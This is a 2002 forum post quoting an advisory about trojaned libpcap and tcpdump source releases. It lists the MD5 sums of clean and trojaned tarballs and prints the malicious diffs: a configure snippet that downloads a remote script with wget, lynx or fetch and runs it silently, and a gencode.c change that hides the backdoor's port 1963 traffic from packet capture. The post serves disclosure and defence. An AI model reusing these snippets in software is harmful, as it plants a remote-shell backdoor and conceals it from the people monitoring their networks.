SocialParasite
100% pure failtanium.
Registered: Jul 2000
Location: Beatrice, Nebraska
Posts: 18490 |
Libpcap and tcpdump trojaned.
Ruh roh!
http://hlug.fscker.com/
quote:
Latest libpcap & tcpdump sources from tcpdump.org contain a trojan.
Background:
* Libpcap provides a packet sniffing library for programs like Snort.
* Tcpdump is a standard tool for packet sniffing.
Details:
* The trojan contains modifications to the configure script and gencode.c (in libpcap only).
* The configure script downloads http://mars.raketti.net/~mash/services which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it.
* The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes:
o A - program exits
o D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
o M - closes connection, sleeps 3600 seconds, and then reconnects
Hmm... ADM...
* It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections.
* Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic.
* This is similar to the OpenSSH trojan a few months ago.
Updates:
* Many Mirrors are infected with the trojan!!!
* Main Mirror Site (wiretapped.net) will no longer be providing tcpdump downloads until things are straightened out.
Good sources:
http://www.ibiblio.org/pub/Linux/di...ap-0.7.1.tar.gz
http://www.ibiblio.org/pub/Linux/di...mp-3.6.2.tar.gz
http://www.ibiblio.org/pub/Linux/di...mp-3.7.1.tar.gz
MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz
Trojaned sources:
http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz
MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz
The (relevant) gencode.c diff:
*** 288,293 ****
--- 289,318 ----
{
extern int n_errors;
int len;
+ int l;
+ char *port = "1963";
+ char *str, *tmp, *new = "not port 1963";
+
+ if (buf && *buf && strstr (buf, port)) {
+ buf = "port 1964";
+ }
+ else {
+ l = strlen (new) + 1;
+ if (!(!buf || !*buf)) {
+ l += strlen (buf);
+ l += 5; /* and */
+ }
+
+ str = (char *)malloc (l);
+ str[0] = '\0';
+ if (!(!buf || !*buf)) {
+ strcpy (str, buf);
+ strcat (str, " and ");
+ }
+
+ strcat (str, new);
+ buf = str;
+ }
no_optimize = 0;
n_errors = 0;
***************
The (relevant) configure diff:
+ CNF="services"
+ URL="mars.raketti.net/~mash/$CNF"
! (IFS=","
! ARGS="wget -q -O -,lynx --source,fetch -q -o -"
!
! for i in $ARGS; do
! IFS=" "
! $i $URL 1> $CNF
! if [ -f $CNF ]; then sh $CNF
! exit
! fi
! rm -f $CNF
! done) 1>/dev/null 2>/dev/null &
__________________
The pinnacle of Failbot technology.
Report this post to a moderator |
IP: Logged
|
![[new thread]](/images/vb/button_newthread_off.png "Post New Thread")
![[post reply]](/images/vb/button_newreply_off.png "Post A Reply")
11-13-2002 06:40 PM
Attachment: 
